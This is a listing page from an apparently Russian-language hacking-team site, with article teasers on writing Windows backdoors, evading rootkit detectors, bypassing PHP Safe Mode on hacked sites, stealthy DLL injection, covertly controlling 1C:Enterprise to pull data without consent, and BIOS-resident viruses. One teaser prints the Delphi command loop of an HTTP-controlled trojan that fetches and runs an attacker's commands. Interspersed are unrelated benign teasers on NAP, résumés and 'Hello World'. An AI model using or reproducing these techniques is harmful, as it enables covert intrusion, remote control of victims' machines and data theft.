Год назад об AJAX говорили как о новой перспективной технологии, но сегодня он как-то выпал из поля зрения. Значит ли это, что AJAX не оправдал надежд и постепенно уходит в историю? Нет и еще раз нет. AJAX – это технология back-end, реализация которой перешла с прикладного уровня на уровень фреймворков.
Общие Статьи | Просмотров: 1923 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

В этой статье я хочу рассмотреть некоторые приемы написания BackDoor-ов для Windows XP. Давайте сначала сформулируем минимальные требования к нашему "боевому" бэкдору:

1) автозагрузка при каждом старте системы;
2) невидимость в списке процесов;
3) небольшой размер бинарника;

Основные функции, такие как возможность работы с файловой системой, процессами, учетными записями пользователей и т.д., должны присутствовать в зависимости от потребностей. Рассмотрим все по порядку.

Общие Статьи | Просмотров: 1837 | Добавил: aka_kludge | Дата: 04.01.2009 | Комментарии (0)

PatchFinder - изощренная диагностическая утилита, разработанная для детектирования руткитов. Она использует технику EPA (Анализ пути запуска) для нахождения руткитов. Эта статья покажет как обойти защиту на основе ЕРА.
Общие Статьи | Просмотров: 1705 | Добавил: aka_kludge | Дата: 04.01.2009 | Комментарии (0)

Начинающего хакера очень часто может испугать то, что на сервере включена опция Safe Mode в PHP. К примеру, хакер взломал какой-то сайт через include(), require(), fopen() уязвимость, а на исполнение команд оболочки у него недостаточно прав. Каждый с этим сталкивался, но не каждый решал эту проблему.

Способов обхода Safe Mode довольно много. Но сначала разберемся в том, что собой представляет Safe Mode. Safe Mode – это директива в PHP, которая запрещает исполнять system(), passthru(), exec(), shell_exec и другие функции, выполняющие системные программы. Если PHP настроен, как Safe Mode + open_basedir, тогда никакие файлы вне open_basedir не обслуживаются PHP, не стартуют программы, которые находятся вне данной директории. 

Список функций ограничиваемых Safe Mode: chgrp, include, require, chmod, link, rmdir, chown, passthru, sumlink, exec, popen, system, fopen, readfile, unlink, file, rename. Довольно полезная функция для системных администраторов и довольно вредная для хакеров, не так ли? Но, все можно обойти, я в этом убедился уже давно, чего и тебе желаю. Safe Mode не блокирует функции include(), require(), fopen(), fwrite() и многие другие, не менее полезные. Тогда мы просто реализуем все, что нам нужно с помощью остальных функций PHP не прибегая к запуску системных команд.

Общие Статьи | Просмотров: 1816 | Добавил: aka_kludge | Дата: 04.01.2009 | Комментарии (0)

Статья предназначена для более-менее опытных троянмейкеров, умеющих работать с TCP/IP через API и знакомых с HTTP-протоколом, в частности, с методом POST. Кроме того, необходимо разбираться в PHP на уровне работы с текстовыми файлами, строками и суперглобальными ассоциированными массивами (к коим относятся $_GET, $_POST и $_SERVER). По ходу дела я, конечно, буду давать некоторые объяснения, но для понимания всего этого "с нуля" их будет явно не достаточно.

Не испугались? ;) Ну и правильно - чего тут страшного? Начнём.
Общие Статьи | Просмотров: 2887 | Добавил: aka_kludge | Дата: 04.01.2009 | Комментарии (0)

Код, реализующий это, выглядит так:

// сначала запрос пустой
request:='';
//
цикл работы трояна
while true do
begin
//
отсылаем скрипту запрос
if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then
begin
//
если отослать не удалось - ждём минуту и крутим следующую итерацию
sleep(1000*SEC);
continue;
end;
//
если отослать удалось - проверим answer
if (answer='') then
begin
//
команд от хакера нет - очистим reques,
//
ждём минуту и крутим следующую итерацию
request:='';
sleep(1000*SEC);
continue;
end;
//
если управление дошло сюда - в answer у нас команда хакера
//
выполняем команду
request:=DoCommand(answer);
end;
Общие Статьи | Просмотров: 2548 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

Внедрению DLL так или иначе (обычно в связи с перехватом API) посвящено достаточно большое количество статей. Но ни в одной из тех, которые я читал, не говорится, как внедрить эту DLL в чужой процесс незаметно, т.е. не храня на диске файл самой DLL, а оперируя им непосредственно в памяти.

В настоящее время широчайшую распространенность получили операционные системы семейства Windows NT/2000/XP. Они широко используются не только как домашние системы, но и в качестве серверов. Эта линейка ОС отличается неплохой защищенностью от вредоносных программ, а также для нее существует большое количество дополнительных систем безопасности (различные антивирусы, фаерволлы). Основной язык для приводимых фрагментов кода – C++, но материал актуален и для любого другого языка (Delphi, Ассемблер и т.д.). Единственное условие - язык должен быть 100% компилируемым, а также поддерживать работу с указателями и ассемблерные вставки. Так что любителям VB скорее всего придется обломиться. Для полного понимания материала статьи нужно хотя бы немножко знать ассемблер и С++. Как известно, OC Windows NT целиком построена на системе DLL (динамически загружаемых библиотек). Система предоставляет приложениям сервисные API функции, с помощью которых оно может взаимодействовать с системой. Предполагается, что читатель знаком с программированием в Visual C++, работой загрузчика Windows (загрузка и вызов функций DLL), а также имеет некоторые представления о программировании на ассемблере.

Данная статья актуальна только для систем Windows NT/2000/XP.
Общие Статьи | Просмотров: 5095 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

Ситуация, когда на одной рабочей станции не установлены последние заплатки, на другой не работает брандмауэр, а на третьей - антивирус или антишпионское ПО, встречается сплошь и рядом. А ведь безопасность всей Сети определяется самым слабым звеном. Как же быть администратору с клиентскими компьютерами, не удовлетворяющими требованиям безопасности?

Новая технология NAP

Технология защиты сетевого доступа NAP (Network Access Protection), реализованная в Win2k8, призвана помочь администратору в поддержании безопасности Сети на максимально высоком уровне. Принцип работы NAP заключается в следующем. При подключении клиента к Сети проверяется наличие файрвола, последних обновлений безопасности, обновлений антивирусных программ и т.д. Если компьютер не удовлетворяет принятым политикам, в полном доступе ему будет отказано до тех пор, пока выявленные проблемы не будут устранены. В зависимости от настроек, компьютеры, не прошедшие контроль, либо блокируются полностью, либо помещаются в карантин (например, им выдаются IP-адреса из другого диапазона). Как вариант, можно настроить только журналирование подобных событий без принятия каких-либо мер. В карантинной подсети могут располагаться коррекционные сервера (Remediation Server), предоставляющие ресурсы для устранения выявленных недостатков, к примеру, сервер обновлений WSUS (Windows Server Update Services) или антивирусная база. После обновления соответствие политикам проверяется повторно, – если все нормально, система получает доступ в Сеть. Среди настроек можно указать веб-страничку, на которой описано, почему пользователь не может подключиться, и что ему для этого нужно сделать.

Общие Статьи | Просмотров: 3047 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

Огромное количество организаций использует систему 1С:Предприятие, но не каждый пользователь подозревает о возможном проникновении в его систему чужаков и получении данных из базы, а также частичном управлении функциями 1С удаленно. Сразу скажу что, данный механизм использования 1С:Предприятие позволит усовершенствовать некоторые функции системы и ни коим образом не является руководством к разрушению (порче) данных или к помехам действий удаленного пользователя. Статья позволит программистам приобрести дополнительные навыки в использовании системы и расширить познания.

Общий принцип механизма состоит в соединении с 1С через OLE и последующем использованием функций 1С на основе принимаемых команд от удаленного компьютера, т.к. в Delphi мы можем написать приложение невидимое для пользователя, то программа на Delphi, контролирующая 1С, будет скрыта от глаз пользователя и подвох не будет заметен, следовательно вину после приходящего на глазах у пользователя ужаса не на кого будет переложить кроме как на него самого. С помощью подобного механизма открываются возможности по управлению системы находясь за другим компьютером в сети, также появляется доступ к выгрузке данных из системы без согласия на то пользователя, т.к. попадаем мы в систему вместе с пользователем, под его учетной записью и паролем.
Общие Статьи | Просмотров: 2003 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

Поиск работы – редкий, но достаточно важный для соискателя процесс, от результатов которого зависит многое в жизни человека. Рассылка резюме в компании, которые могут стать потенциальным местом работы, и прохождение собеседования – наиболее важные аспекты этого процесса.

Резюме

Само по себе резюме, даже самое хорошее, никому работы не дает. Но оно дает вам шанс выделиться в потоке информации, попадающей в компанию или в кадровое агентство. Хорошо составленное резюме увеличивает ваши шансы заинтересовать работодателя своей кандидатурой и получить приглашение на личное собеседование.

Рассмотрим несколько ключевых факторов, которые влияют на восприятие резюме.

Общие Статьи | Просмотров: 2137 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

Идеальный код существует – и это не шутка. Нет, космически спутники, безошибочная система управления «ядерным щитом», программное обеспечение АЭС тут совершенно не причём. Идеальный код – это программа, выводящая на экран «Hello world».

Фраза «Здравствуй, мир!» известна каждому программисту. Появилась она в 1978 году, как пример использования языка С, и до сих пор остаётся первым шагом в освоении языков программирования для тысяч студентов по всему миру.

Перейдя по ссылке вы увидите пример «Hello World» на трёхстах языках программирования. Каждый вариант программы является примером идеального, безошибочного, совершенного кода.

На Бейсике программа состоит из 21-го символа. На BIT, Redcode, инопланетном Credits – нескольких сотен. Разница в методологии между этими языками – колоссальна. Результат выполнения работы один и тот же.

Общие Статьи | Просмотров: 1955 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (1)

Одно из основных направлений в "битве умов" между авторами компьютерных вирусов и антивирусных программ связано с размещением тела вируса в оперативной памяти. На первый взгляд, все банально: задача вируса – спрятаться так, чтобы не нашли, задача антивируса – найти. В ходе эволюции технологий, используемых как для написания вредоносных программ, так и для противодействия им, появились достаточно нетривиальные решения. Поле деятельности уже давно не ограничивается механизмами управления памятью, входящими в состав операционной системы. Сегодня, для того, чтобы быть "на уровне", авторам, как вирусов, так и антивирусов необходимо понимание принципов взаимодействия программ и оборудования, таких как работа с конфигурационными регистрами чипсета, Model-Specific регистрами процессора (MSR), использование областей памяти, имеющих специальный статус с точки зрения контроллера памяти (SMRAM, Shadow и т.п.).

Автор данной статьи не является вирусологом и тем более "вирусописателем", а работает в области разработки аппаратного и системного программного обеспечения. Поэтому предлагаемый материал подготовлен как информация о потенциальной уязвимости, дающей возможность вирусу "спрятаться" нетривиальным методом. Речь идет об использовании "теневой" памяти или Shadow RAM и представлении вируса в статусе части выполняемого блока BIOS.

Общие Статьи | Просмотров: 1839 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

В ранее опубликованной статье "Вирус в Shadow RAM" были рассмотрены уязвимости, позволяющие программно модифицировать выполняемый блок BIOS, находящийся в оперативной памяти. Очевидно, это дает вредоносным программам широкие возможности, но не вызывает повреждения оборудования, поскольку искажается не содержимое микросхемы BIOS, а его копия, находящаяся в ОЗУ и обновляемая при каждом перезапуске компьютера.

Продолжая начатую тему, рассмотрим и более тяжелый случай – искажение содержимого микросхемы BIOS. После такой атаки, материнская плата требует ремонта, а точнее – восстановления содержимого микросхемы BIOS.

Общие Статьи | Просмотров: 1837 | Добавил: LeadyTOR | Дата: 04.01.2009 | Комментарии (0)

В лаборатории компании Websense провели интересно исследование вредоносного кода, внедряемого на сайты буквально каждый день. В исследовании  разобраны вопросы, связанные с внедрением вредоносного кода, от начала и до конца, разобран "по косточкам" сам код, а также проанализирован сайт, на который он ссылается и итоги внедрения. Перевод статьи мы предлагаем вам.

Внедренный код

Свою экскурсию мы начнем с преставления конкретного внедряемого кода, который попал к нам на рассмотрение, однако не забывайте, что других его разновидностей на данный момент – тысячи. Нам же предстоит иметь дело с довольно специфичной инъекцией, жертвой которой уже успели стать десятки веб-сайтов, начиная с правительственных и финансовых ресурсов, и заканчивая спортивными веб-страницами и онлайн-магазинами.

Приведенный ниже скриншот показывает, сайты каких категорий уже были скомпрометированы и демонстрирует внедренный в них код:

Общие Статьи | Просмотров: 1881 | Добавил: aka_kludge | Дата: 17.12.2008 | Комментарии (0)

Движки по типу «все включено» получили на просторах Сети широкое распространение. Зайдя на сайт www.postnuke.ru, я обнаружил, что в качестве движка используется PostNuke (еще бы :)). Стоит ли говорить, что версия была последней, а значит, на дыры рассчитывать не приходилось. Набрав в адресной строке www.postnuke.ru/robots.txt, я получил список запрещенных к индексации каталогов:

User-agent: *
Disallow: admin.php
Disallow: config
Disallow: header
Disallow: footer
Disallow: pntables
Disallow: referer
Disallow: /images
Disallow: /includes
Disallow: /modules/NS-
Disallow: /pnadodb
Disallow: /themes
Disallow: /pnTemp
Disallow: /docs
Disallow: /javascript

К сожалению, chmod’ы на серверы были расставлены грамотно, так что никакой дополнительной информации мне получить не удалось. Тогда я вспомнил об удобном сервисе по сбору данных из Гугла – madnet.name/tools/madss. Вбив урл атакуемого ресурса, буквально через пару секунд я лицезрел ответ:

Общие Статьи | Просмотров: 1647 | Добавил: aka_kludge | Дата: 17.12.2008 | Комментарии (0)

Теория игр – раздел математики, описывающий состояние динамически взаимодействующих систем категориями простых математических величин. Игра – имитация реальности, как идеальный газ в термодинамики или кот Шрёдингера для квантовой теории. Игра – лучший способ постижения Дао хакерства.

Игры, имитирующие деятельность компьютерного взломщика, и эмуляторы хакерского вторжения чаще всего строятся по одним принципам. Научиться взламывать по ним, конечно, нельзя. Проверить накопленные знания? Ну, для этого выберите соответствующую викторину. Самое важное, что дают хакерские игры – проникновение в атмосферу андеграунда. С резким привкусом озона от перегруженных трансфертных сверхмагистралей, с красными глазами, отсвечивающими зелёными строчками дикого китайского кода, с чувством невероятного удовлетворения от решения сложных математических задач. Всё это гораздо интереснее скучной консоли и унылой текстовой информации. Фотошопный интерфейс, голографические мегапрограммы и яркая психоделическая фантазия сценаристов со всеми теми штуками, которые навсегда останутся для обычных пользователей шамбалой компьютерных технологий. Настоящий хакерский андеграунд найти – нельзя. А увидеть – запросто.


Общие Статьи | Просмотров: 2670 | Добавил: aka_kludge | Дата: 17.12.2008 | Комментарии (0)

Идея использовать неинициализированные переменные для локальных/удаленных атак пришла в хакерские головы еще лет десять тому назад. Однако, ни одного работоспособного exploit'а за минувшее время не появилось. Почему? В отличие от переполняющихся буферов (легко обнаруживаемых fuzzer'ами), поиск неинициализированных указателей требует кропотливого ручного анализа кода и творческого вдохновения. Без него разобраться в вековых наслоениях пластов различных модулей (по которым можно изучать хронологию развития Си++) не так-то просто, если вообще возможно.
Общие Статьи | Просмотров: 1714 | Добавил: aka_kludge | Дата: 17.12.2008 | Комментарии (0)

В Perl предусмотрен механизм фильтров через которые пропускаюся исходные файлы перед тем, как они будут обработаны  интерпретатором. Одним из таких фильтров является Decrypt, который расшифровывает предварительно зашифрованный файл. Таким образом в Perl можно реализовать скрытие исходных текстов. По-умолчанию применяется обычный XOR, однако разработчик имеет возможность подключить любой алгоритм. Сам модуль, включая алгоритм шифрования, как правило, статически линкуется с интерпретатором, что немного усложняет расшифровку. В статье будет показано как можно получить исходный текст из зашифрованного файла независимо от того, чем изначально этот файл зашифрован. Об алгоритме шифрования нам не нужно знать ничего, это может быть самый стойкий криптографический алгоритм с бесконечной длиной ключа. Вот пример такого файла (часть строк вырезана):
Общие Статьи | Просмотров: 1855 | Добавил: aka_kludge | Дата: 17.12.2008 | Комментарии (0)

Движки по типу «все включено» получили на просторах Сети широкое распространение. Зайдя на сайт www.postnuke.ru, я обнаружил, что в качестве движка используется PostNuke (еще бы :)). Стоит ли говорить, что версия была последней, а значит, на дыры рассчитывать не приходилось. Набрав в адресной строке www.postnuke.ru/robots.txt, я получил список запрещенных к индексации каталогов:
Общие Статьи | Просмотров: 1663 | Добавил: aka_kludge | Дата: 12.12.2008 | Комментарии (0)

В лаборатории компании Websense провели интересно исследование вредоносного кода, внедряемого на сайты буквально каждый день. В исследовании  разобраны вопросы, связанные с внедрением вредоносного кода, от начала и до конца, разобран "по косточкам" сам код, а также проанализирован сайт, на который он ссылается и итоги внедрения. Перевод статьи мы предлагаем вам.
Общие Статьи | Просмотров: 2101 | Добавил: aka_kludge | Дата: 12.12.2008 | Комментарии (0)

    Главная      
...
На службе : дней

14:37
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск


Copyright tHR - TeAM 2024 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, ... Яндекс.Метрика